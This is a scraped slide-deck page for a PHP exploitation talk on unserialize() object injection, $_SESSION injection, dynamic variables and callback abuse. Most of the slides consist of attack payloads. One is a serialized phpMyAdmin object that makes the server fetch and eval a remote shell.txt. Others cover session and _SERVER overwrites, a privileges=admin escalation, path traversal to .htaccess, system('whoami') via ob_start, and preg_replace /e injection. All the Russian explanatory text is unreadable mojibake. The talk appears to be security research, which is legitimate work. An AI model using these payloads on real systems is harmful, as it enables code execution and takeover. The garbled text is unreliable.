際際滷

際際滷Share a Scribd company logo

[ONSEC] PHP unserialize() _SESSION and Dynamics

D
d0znp
1 of 14
Downloaded 33 times
PHP unserialize(), $_SESSION and dynamics. Hints and Tricks
5 仆仂磡 2009, 弌亠仍, 从仂仆. PoC2009 束Shocking News in PHP Exploitation損 - Stefan Esser http://www.suspekt.org/downloads/POC200 9-ShockingNewsInPHPExploitation.pdf 丐丕 弌丐丕丐
弌丕丐亂 丕亊弌丐 仂仍亰仂于舒亠仍从亳亠 亟舒仆仆亠 仗仂仗舒亟舒ム 于 unserialize() 从仍舒 magic-仄亠仂亟舒仄亳: __destruct, __toString, __wakeup 亅亳 从仍舒 亟仂仗仆亠 亳亰 从仂亟舒 unserialize() 亅亳 仄亠仂亟 仂亟亠亢舒 从舒从亳亠-仍亳弍仂 磶于亳仄仂亳 (PHP inj, SQL inj, etc)
$configuration=unserialize($_POST['configuration']); function __wakeup(){ $this->load(); eval('?>' . trim(file_get_contents($this->getSource()))); O:10:"PMA_Config":1:{s:6:"source";s:70:"ftp://login:passw ord@tvoy_host.com/www/shell.txt";} phpMyAdmin <= 2.11.9 http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1 :{a:1:{a:1:{... DoS 仗仂 亅亠. Information Leak 仗仂-从亳 ;) 舒亟舒亠仄: Fatal error: Maximum execution time of 30 seconds exceeded in z:homewwwa.php on line 493 N-舒亰, 亳仍亠仄 仆亳从舒仍仆亠 仗亳, 仂亳亠 仗仂 于亠仄亠仆亳, 仗仂仍舒亠仄 从 于亰仂于仂于 仗亳仍仂亢亠仆亳. http://www.xakep.ru/post/52630/default.asp 丼丐-丐 乂?
PHP 5.2 <= 5.2.13 PHP 5.3 <= 5.3.2 $_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data']; 亳仍亳 $_SESSION = array_merge($_SESSION, $_POST); prefix=! data=|xxx|O:10:"evilObject":0:{} 仂仍舒亠 舒仆舒仍仂亞 unserialize() 亠 仂仍从仂! _SESSION (MOPS-2010-060)
亳 REGISTER_GLOBALS=On: ! 丼亠仆亳亠 (仗仂仗舒亟舒仆亳亠 于 _SESSION) _SERVER, 仗亳于舒仆 仗亠亠仄亠仆仆 从仍舒仂于, etc test.php?prefix=!&data=|_SERVER| ! 亠亠亰舒仗亳 _SERVER, 仗亳于舒仆 仗亠亠仄亠仆仆 从仍舒仂于, etc test.php?prefix=!&data=|_SERVER|a:1:{s:11:"REMOTE_ ADDR";s:3:"!!!";} 丼 丕丼 亅弌弌?
foreach ($_GET as $key => $value) { $$key = $value; } test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Variables
parse_str($_SERVER['QUERY_STRING']); //仗亠亠仗亳亠 仍亠仄亠仆 _SERVER 仗亳 ?SERVER[HTTP_HOST]=!!! extract($_SERVER['QUERY_STRING']); //仗亠亠仗亳亠 于亠 _SERVER 仗亳 ?_SERVER[HTTP_HOST]=!!! import_request_variables(GPC); test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Variables
$action = $_GET[action]; $param = $_GET[param]; $action($param); test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Functions
PHP5 仂从仂仍仂 40 仆从亳亶 亳仗仂仍亰ム Callback $ucback = $_GET[callback]; $ar = array(1,3,3,7); $na = array_map($ucback, $ar) test.php?callback=phpinfo ob_start, usort, uasort, uksort, array_filter, array_walk Callbacks
$bufout = 'system'; ob_start($bufout); echo 'whoami'; ob_end_flush(); 仍亳 仄仂亢仆仂 于仍亳 仆舒 舒亞仄亠仆 ob_start 仄仂亢仆仂 仂从 从亳仆 弍亠 于 仆亢仆仂亠 仄亠仂, 仆舒仗亳仄亠 - system 亟亠仍仆仂 仂弍 ob_ :)
$assn = valid prefix . $_GET['toas'] . " any postfix"; assert($assn); eval($assn); $regexp = $_GET['rx']; $var = '<tag>'.$_GET['vr']'</tag>'; preg_replace("/<tag>(.*?)$regexp</tag>/", '1', $var); test.php?rx=</tag>/e%00 弌舒亠 仗亠仆亳 仂 亞仍舒于仆仂仄
丐丐乘: D0znpp@ONSEC.RU 弌乘 ???

More Related Content

[ONSEC] PHP unserialize() _SESSION and Dynamics

  • 1. PHP unserialize(), $_SESSION and dynamics. Hints and Tricks
  • 2. 5 仆仂磡 2009, 弌亠仍, 从仂仆. PoC2009 束Shocking News in PHP Exploitation損 - Stefan Esser http://www.suspekt.org/downloads/POC200 9-ShockingNewsInPHPExploitation.pdf 丐丕 弌丐丕丐
  • 3. 弌丕丐亂 丕亊弌丐 仂仍亰仂于舒亠仍从亳亠 亟舒仆仆亠 仗仂仗舒亟舒ム 于 unserialize() 从仍舒 magic-仄亠仂亟舒仄亳: __destruct, __toString, __wakeup 亅亳 从仍舒 亟仂仗仆亠 亳亰 从仂亟舒 unserialize() 亅亳 仄亠仂亟 仂亟亠亢舒 从舒从亳亠-仍亳弍仂 磶于亳仄仂亳 (PHP inj, SQL inj, etc)
  • 4. $configuration=unserialize($_POST['configuration']); function __wakeup(){ $this->load(); eval('?>' . trim(file_get_contents($this->getSource()))); O:10:"PMA_Config":1:{s:6:"source";s:70:"ftp://login:passw ord@tvoy_host.com/www/shell.txt";} phpMyAdmin <= 2.11.9 http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
  • 5. a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1:{a:1 :{a:1:{a:1:{... DoS 仗仂 亅亠. Information Leak 仗仂-从亳 ;) 舒亟舒亠仄: Fatal error: Maximum execution time of 30 seconds exceeded in z:homewwwa.php on line 493 N-舒亰, 亳仍亠仄 仆亳从舒仍仆亠 仗亳, 仂亳亠 仗仂 于亠仄亠仆亳, 仗仂仍舒亠仄 从 于亰仂于仂于 仗亳仍仂亢亠仆亳. http://www.xakep.ru/post/52630/default.asp 丼丐-丐 乂?
  • 6. PHP 5.2 <= 5.2.13 PHP 5.3 <= 5.3.2 $_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data']; 亳仍亳 $_SESSION = array_merge($_SESSION, $_POST); prefix=! data=|xxx|O:10:"evilObject":0:{} 仂仍舒亠 舒仆舒仍仂亞 unserialize() 亠 仂仍从仂! _SESSION (MOPS-2010-060)
  • 7. 亳 REGISTER_GLOBALS=On: ! 丼亠仆亳亠 (仗仂仗舒亟舒仆亳亠 于 _SESSION) _SERVER, 仗亳于舒仆 仗亠亠仄亠仆仆 从仍舒仂于, etc test.php?prefix=!&data=|_SERVER| ! 亠亠亰舒仗亳 _SERVER, 仗亳于舒仆 仗亠亠仄亠仆仆 从仍舒仂于, etc test.php?prefix=!&data=|_SERVER|a:1:{s:11:"REMOTE_ ADDR";s:3:"!!!";} 丼 丕丼 亅弌弌?
  • 8. foreach ($_GET as $key => $value) { $$key = $value; } test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Variables
  • 9. parse_str($_SERVER['QUERY_STRING']); //仗亠亠仗亳亠 仍亠仄亠仆 _SERVER 仗亳 ?SERVER[HTTP_HOST]=!!! extract($_SERVER['QUERY_STRING']); //仗亠亠仗亳亠 于亠 _SERVER 仗亳 ?_SERVER[HTTP_HOST]=!!! import_request_variables(GPC); test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Variables
  • 10. $action = $_GET[action]; $param = $_GET[param]; $action($param); test.php?_SERVER[HTTP_HOST]=!!! test.php?_SESSION[privileges]=admin test.php?config[log_file]=../../../../../../../../../.htaccess Dynamic Functions
  • 11. PHP5 仂从仂仍仂 40 仆从亳亶 亳仗仂仍亰ム Callback $ucback = $_GET[callback]; $ar = array(1,3,3,7); $na = array_map($ucback, $ar) test.php?callback=phpinfo ob_start, usort, uasort, uksort, array_filter, array_walk Callbacks
  • 12. $bufout = 'system'; ob_start($bufout); echo 'whoami'; ob_end_flush(); 仍亳 仄仂亢仆仂 于仍亳 仆舒 舒亞仄亠仆 ob_start 仄仂亢仆仂 仂从 从亳仆 弍亠 于 仆亢仆仂亠 仄亠仂, 仆舒仗亳仄亠 - system 亟亠仍仆仂 仂弍 ob_ :)
  • 13. $assn = valid prefix . $_GET['toas'] . " any postfix"; assert($assn); eval($assn); $regexp = $_GET['rx']; $var = '<tag>'.$_GET['vr']'</tag>'; preg_replace("/<tag>(.*?)$regexp</tag>/", '1', $var); test.php?rx=</tag>/e%00 弌舒亠 仗亠仆亳 仂 亞仍舒于仆仂仄